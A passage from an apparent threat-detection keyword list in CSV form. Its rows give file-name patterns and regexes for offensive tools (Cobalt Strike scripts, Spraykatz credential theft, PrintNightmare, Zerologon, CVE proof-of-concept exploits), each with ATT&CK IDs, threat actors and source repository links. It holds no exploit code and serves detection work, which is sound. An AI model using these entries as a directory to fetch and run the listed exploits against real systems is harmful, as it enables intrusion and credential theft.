Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/offsecginger/AggressorScripts","1","1","N/A","N/A","10","10","149","30","2022-01-01T19:04:27Z","2018-11-30T03:14:45Z","39231"
"*CustomKeyboardLayoutPersistence*",".{0,1000}CustomKeyboardLayoutPersistence.{0,1000}","offensive_tool_keyword","cobaltstrike","Achieve execution using a custom keyboard layout","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/NtQuerySystemInformation/CustomKeyboardLayoutPersistence","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","39232"
"*customWmiExec*wmiexec.py*",".{0,1000}customWmiExec.{0,1000}wmiexec\.py.{0,1000}","offensive_tool_keyword","spraykatz","Spraykatz is a tool without any pretention able to retrieve credentials on Windows machines and large Active Directory environments.","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008","TA0003 - TA0004 - TA0007","N/A","N/A","Credential Access","https://github.com/aas-n/spraykatz","1","0","N/A","N/A","9","8","763","121","2020-06-20T12:14:00Z","2019-09-09T14:38:28Z","39233"
"*CVE-*.bash*",".{0,1000}CVE\-.{0,1000}\.bash.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1543 - T1588 - T1211 - T1203","TA0008 - TA0009 - TA0010","N/A","N/A","Exploitation tool","https://github.com/gottburgm/Exploits","1","1","#linux","N/A","N/A","2","193","106","2020-04-17T07:28:55Z","2017-10-13T10:19:55Z","39235"
"*CVE-*.bat*",".{0,1000}CVE\-.{0,1000}\.bat.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/gottburgm/Exploits","1","0","N/A","N/A","N/A","2","193","106","2020-04-17T07:28:55Z","2017-10-13T10:19:55Z","39236"
"*CVE-*.bin*",".{0,1000}CVE\-.{0,1000}\.bin.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/gottburgm/Exploits","1","0","N/A","N/A","N/A","2","193","106","2020-04-17T07:28:55Z","2017-10-13T10:19:55Z","39237"
"*CVE-*.c*",".{0,1000}CVE\-.{0,1000}\.c.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/gottburgm/Exploits","1","0","N/A","N/A","N/A","2","193","106","2020-04-17T07:28:55Z","2017-10-13T10:19:55Z","39238"
"*CVE-*.com*",".{0,1000}CVE\-.{0,1000}\.com.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/gottburgm/Exploits","1","0","N/A","N/A","N/A","2","193","106","2020-04-17T07:28:55Z","2017-10-13T10:19:55Z","39239"
"*CVE-*.cpp*",".{0,1000}CVE\-.{0,1000}\.cpp.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/gottburgm/Exploits","1","0","N/A","N/A","N/A","2","193","106","2020-04-17T07:28:55Z","2017-10-13T10:19:55Z","39240"
"*CVE-*.exe*",".{0,1000}CVE\-.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1543 - T1588 - T1211 - T1203","TA0008 - TA0009 - TA0010","N/A","N/A","Exploitation tool","https://github.com/gottburgm/Exploits","1","1","N/A","N/A","N/A","2","193","106","2020-04-17T07:28:55Z","2017-10-13T10:19:55Z","39241"
"*CVE-*.git*",".{0,1000}CVE\-.{0,1000}\.git.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/gottburgm/Exploits","1","0","N/A","N/A","N/A","2","193","106","2020-04-17T07:28:55Z","2017-10-13T10:19:55Z","39242"
"*CVE-*.msi*",".{0,1000}CVE\-.{0,1000}\.msi.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/gottburgm/Exploits","1","0","N/A","N/A","N/A","2","193","106","2020-04-17T07:28:55Z","2017-10-13T10:19:55Z","39243"
"*CVE-*.pl*",".{0,1000}CVE\-.{0,1000}\.pl.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/gottburgm/Exploits","1","0","N/A","N/A","N/A","2","193","106","2020-04-17T07:28:55Z","2017-10-13T10:19:55Z","39244"
"*CVE-*.ps1*",".{0,1000}CVE\-.{0,1000}\.ps1.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1543 - T1588 - T1211 - T1203","TA0008 - TA0009 - TA0010","N/A","N/A","Exploitation tool","https://github.com/gottburgm/Exploits","1","1","N/A","N/A","N/A","2","193","106","2020-04-17T07:28:55Z","2017-10-13T10:19:55Z","39245"
"*CVE-*.py*",".{0,1000}CVE\-.{0,1000}\.py.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1543 - T1588 - T1211 - T1203","TA0008 - TA0009 - TA0010","N/A","N/A","Exploitation tool","https://github.com/gottburgm/Exploits","1","1","N/A","N/A","N/A","2","193","106","2020-04-17T07:28:55Z","2017-10-13T10:19:55Z","39246"
"*CVE-*.reg*",".{0,1000}CVE\-.{0,1000}\.reg.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/gottburgm/Exploits","1","0","N/A","N/A","N/A","2","193","106","2020-04-17T07:28:55Z","2017-10-13T10:19:55Z","39247"
"*CVE-*.run*",".{0,1000}CVE\-.{0,1000}\.run.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/gottburgm/Exploits","1","0","N/A","N/A","N/A","2","193","106","2020-04-17T07:28:55Z","2017-10-13T10:19:55Z","39248"
"*CVE-*.sh*",".{0,1000}CVE\-.{0,1000}\.sh.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/gottburgm/Exploits","1","0","N/A","N/A","N/A","2","193","106","2020-04-17T07:28:55Z","2017-10-13T10:19:55Z","39249"
"*CVE-*.vb*",".{0,1000}CVE\-.{0,1000}\.vb.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/gottburgm/Exploits","1","0","N/A","N/A","N/A","2","193","106","2020-04-17T07:28:55Z","2017-10-13T10:19:55Z","39250"
"*CVE-*.vbe*",".{0,1000}CVE\-.{0,1000}\.vbe.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/gottburgm/Exploits","1","0","N/A","N/A","N/A","2","193","106","2020-04-17T07:28:55Z","2017-10-13T10:19:55Z","39251"
"*CVE-*.vbs*",".{0,1000}CVE\-.{0,1000}\.vbs.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/gottburgm/Exploits","1","0","N/A","N/A","N/A","2","193","106","2020-04-17T07:28:55Z","2017-10-13T10:19:55Z","39252"
"*CVE-*.vbscript*",".{0,1000}CVE\-.{0,1000}\.vbscript.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/gottburgm/Exploits","1","0","N/A","N/A","N/A","2","193","106","2020-04-17T07:28:55Z","2017-10-13T10:19:55Z","39253"
"*CVE-*.zsh*",".{0,1000}CVE\-.{0,1000}\.zsh.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/gottburgm/Exploits","1","0","N/A","N/A","N/A","2","193","106","2020-04-17T07:28:55Z","2017-10-13T10:19:55Z","39254"
"*CVE*/exploit.sh*",".{0,1000}CVE.{0,1000}\/exploit\.sh.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","0","#linux","N/A","10","10","5909","1133","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z","39255"
"*CVE_*_exploited.txt*",".{0,1000}CVE_.{0,1000}_exploited\.txt.{0,1000}","offensive_tool_keyword","POC","A Safer PoC for CVE-2022-22965 (Spring4Shell)","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Exploitation tool","https://github.com/colincowie/Safer_PoC_CVE-2022-22965","1","1","N/A","N/A","N/A","1","44","7","2022-05-27T12:56:40Z","2022-03-31T16:58:56Z","39256"
"*cve_2_MSF_exploit_Mapping*",".{0,1000}cve_2_MSF_exploit_Mapping.{0,1000}","offensive_tool_keyword","Xerror","fully automated pentesting tool","T1083 - T1069 - T1204 - T1059 - T1078","TA0007 - TA0005 - TA0002 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Chudry/Xerror","1","1","N/A","N/A","N/A","6","509","110","2022-12-08T04:33:03Z","2019-08-16T21:20:52Z","39257"
"*CVE_20*.dll*",".{0,1000}CVE_20.{0,1000}\.dll.{0,1000}","offensive_tool_keyword","cobaltstrike","A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. etc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/yanghaoi/CobaltStrike_CNA","1","1","N/A","N/A","10","10","540","86","2022-01-18T12:47:55Z","2021-04-21T13:10:11Z","39258"
"*cve_2019_0708_bluekeep_fail*",".{0,1000}cve_2019_0708_bluekeep_fail.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","39259"
"*cve_2019_0708_bluekeep_pass*",".{0,1000}cve_2019_0708_bluekeep_pass.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","39260"
"*cve_2020_0796_smbghost.*",".{0,1000}cve_2020_0796_smbghost\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","39261"
"*CVE-2*-RCE.py*",".{0,1000}CVE\-2.{0,1000}\-RCE\.py.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1543 - T1588 - T1211 - T1203","TA0008 - TA0009 - TA0010","N/A","N/A","Exploitation tool","https://github.com/gottburgm/Exploits","1","0","N/A","N/A","N/A","2","193","106","2020-04-17T07:28:55Z","2017-10-13T10:19:55Z","39262"
"*cve-20.x64.dll*",".{0,1000}cve\-20\.x64\.dll.{0,1000}","offensive_tool_keyword","cobaltstrike","The Elevate Kit demonstrates how to use third-party privilege escalation attacks with Cobalt Strike's Beacon payload.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rsmudge/ElevateKit","1","1","N/A","N/A","10","10","912","203","2020-06-22T21:12:24Z","2016-12-08T03:51:09Z","39263"
"*cve-20.x86.dll*",".{0,1000}cve\-20\.x86\.dll.{0,1000}","offensive_tool_keyword","cobaltstrike","The Elevate Kit demonstrates how to use third-party privilege escalation attacks with Cobalt Strike's Beacon payload.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rsmudge/ElevateKit","1","1","N/A","N/A","10","10","912","203","2020-06-22T21:12:24Z","2016-12-08T03:51:09Z","39264"
"*cve-2020-1472-exploit.py*",".{0,1000}cve\-2020\-1472\-exploit\.py.{0,1000}","offensive_tool_keyword","zerologon","Zerologon CVE exploitation","T1210 - T1072","TA0008","N/A","Dispossessor","Exploitation tool","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","39265"
"*CVE-2020-5902-Scanner/scanner.py*",".{0,1000}CVE\-2020\-5902\-Scanner\/scanner\.py.{0,1000}","offensive_tool_keyword","POC","exploit code for F5-Big-IP (CVE-2020-5902)","T1210","TA0008","N/A","N/A","Exploitation tool","https://github.com/aqhmal/CVE-2020-5902-Scanner","1","0","N/A","N/A","N/A","1","55","22","2022-12-08T11:03:15Z","2020-07-05T06:19:09Z","39266"
"*CVE-2021-1675.ps1*",".{0,1000}CVE\-2021\-1675\.ps1.{0,1000}","offensive_tool_keyword","PrintNightmare","PrintNightmare exploitation","T1210 - T1059.001 - T1548.002","TA0001 - TA0002 - TA0004","N/A","Dispossessor","Privilege Escalation","https://github.com/calebstewart/CVE-2021-1675","1","1","N/A","N/A","10","10","1049","230","2021-07-05T08:54:06Z","2021-07-01T23:45:58Z","39267"
"*CVE-2021-1675.py*",".{0,1000}CVE\-2021\-1675\.py.{0,1000}","offensive_tool_keyword","PrintNightmare","PrintNightmare exploitation","T1210 - T1059.001 - T1548.002","TA0001 - TA0002 - TA0004","N/A","Dispossessor","Privilege Escalation","https://github.com/cube0x0/CVE-2021-1675","1","1","N/A","N/A","10","10","1879","582","2021-07-20T15:28:13Z","2021-06-29T17:24:14Z","39268"
"*CVE-2021-27090-Secure-Kernel-EoP-Patch-Downgrade/Config.xml*",".{0,1000}CVE\-2021\-27090\-Secure\-Kernel\-EoP\-Patch\-Downgrade\/Config\.xml.{0,1000}","offensive_tool_keyword","WindowsDowndate","A tool that takes over Windows Updates to craft custom downgrades and expose past fixed vulnerabilities","T1072 - T1486 - T1505.002 - T1495 - T1499.004","TA0005 - TA0004 - TA0003 ","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/WindowsDowndate","1","0","N/A","N/A","10","7","663","88","2024-10-26T10:18:49Z","2024-01-08T19:42:47Z","39269"
"*CVE-2021-34527.ps1*",".{0,1000}CVE\-2021\-34527\.ps1.{0,1000}","offensive_tool_keyword","conti","Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040","Conti Ransomware","Wizard Spider - Black Basta","Ransomware","https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","39270"
"*cve-20220-26809_exploit.py*",".{0,1000}cve\-20220\-26809_exploit\.py.{0,1000}","offensive_tool_keyword","POC","Remote Code Execution Exploit in the RPC Library CVE-2022-26809","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tool","https://github.com/yuanLink/CVE-2022-26809","1","1","N/A","N/A","N/A","1","61","27","2022-05-25T00:57:52Z","2022-05-01T13:19:10Z","39271"
"*CVE-2022-0847-DirtyPipe-Exploits.*",".{0,1000}CVE\-2022\-0847\-DirtyPipe\-Exploits\..{0,1000}","offensive_tool_keyword","POC","exploit the Linux Dirty Pipe vulnerability","T1068 - T1078.003 - T1071.004 - T1072 - T1105","TA0004 - TA0006?","N/A","N/A","Privilege Escalation","https://github.com/AlexisAhmed/CVE-2022-0847-DirtyPipe-Exploits","1","1","#linux","N/A","10","6","595","148","2023-05-20T05:55:45Z","2022-03-12T20:57:24Z","39272"
"*CVE-2022-21882.x64.dll*",".{0,1000}CVE\-2022\-21882\.x64\.dll.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","39273"
"*cve-2022-23131.py *",".{0,1000}cve\-2022\-23131\.py\s.{0,1000}","offensive_tool_keyword","POC","POC exploitaiton of zabbix saml bypass exp vulnerability cve-2022-23131 (Unsafe client-side session storage leading to authentication bypass/instance takeover via Zabbix Frontend with configured SAML)","T1548 - T1190","TA0001 - TA0002","N/A","N/A","Exploitation tool","https://github.com/L0ading-x/cve-2022-23131","1","0","N/A","N/A","N/A","1","29","12","2022-02-22T01:45:34Z","2022-02-22T01:39:52Z","39274"
"*cve-2022-26809-scanVuln.py*",".{0,1000}cve\-2022\-26809\-scanVuln\.py.{0,1000}","offensive_tool_keyword","POC","Remote Code Execution Exploit in the RPC Library CVE-2022-26809","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tool","https://github.com/yuanLink/CVE-2022-26809","1","1","N/A","N/A","N/A","1","61","27","2022-05-25T00:57:52Z","2022-05-01T13:19:10Z","39275"
"*CVE-2022-30190-follina-Office-MSDT-Fixed*",".{0,1000}CVE\-2022\-30190\-follina\-Office\-MSDT\-Fixed.{0,1000}","offensive_tool_keyword","POC","Just another PoC for the new MSDT-Exploit","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tool","https://github.com/komomon/CVE-2022-30190-follina-Office-MSDT-Fixed","1","1","N/A","N/A","N/A","4","396","54","2023-04-13T16:46:26Z","2022-06-02T12:33:18Z","39276"
"*CVE-2022-34709-Credential-Guard-EoP-Patch-Downgrade/Config.xml*",".{0,1000}CVE\-2022\-34709\-Credential\-Guard\-EoP\-Patch\-Downgrade\/Config\.xml.{0,1000}","offensive_tool_keyword","WindowsDowndate","A tool that takes over Windows Updates to craft custom downgrades and expose past fixed vulnerabilities","T1072 - T1486 - T1505.002 - T1495 - T1499.004","TA0005 - TA0004 - TA0003 ","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/WindowsDowndate","1","1","N/A","N/A","10","7","663","88","2024-10-26T10:18:49Z","2024-01-08T19:42:47Z","39277"
"*CVE-2023-20887.git*",".{0,1000}CVE\-2023\-20887\.git.{0,1000}","offensive_tool_keyword","POC","VMWare vRealize Network Insight Pre-Authenticated RCE (CVE-2023-20887)","T1068 - T1190.001 - T1210.002 - T1059.001 - T1059.003 - T1190 - T1569.002","TA0005 - TA0002 - TA0001 - TA0040 - TA0043","N/A","N/A","Exploitation tool","https://github.com/sinsinology/CVE-2023-20887","1","1","N/A","N/A","N/A","3","232","43","2023-06-13T14:39:17Z","2023-06-13T13:17:23Z","39278"
"*cve-2023-21554.nse*",".{0,1000}cve\-2023\-21554\.nse.{0,1000}","offensive_tool_keyword","poc","Windows Message Queuing vulnerability exploitation with custom payloads","T1192 - T1507","TA0002","N/A","N/A","Exploitation tool","https://github.com/Hashi0x/PoC-CVE-2023-21554","1","1","N/A","network exploitation tool","N/A","","N/A","","","","39279"
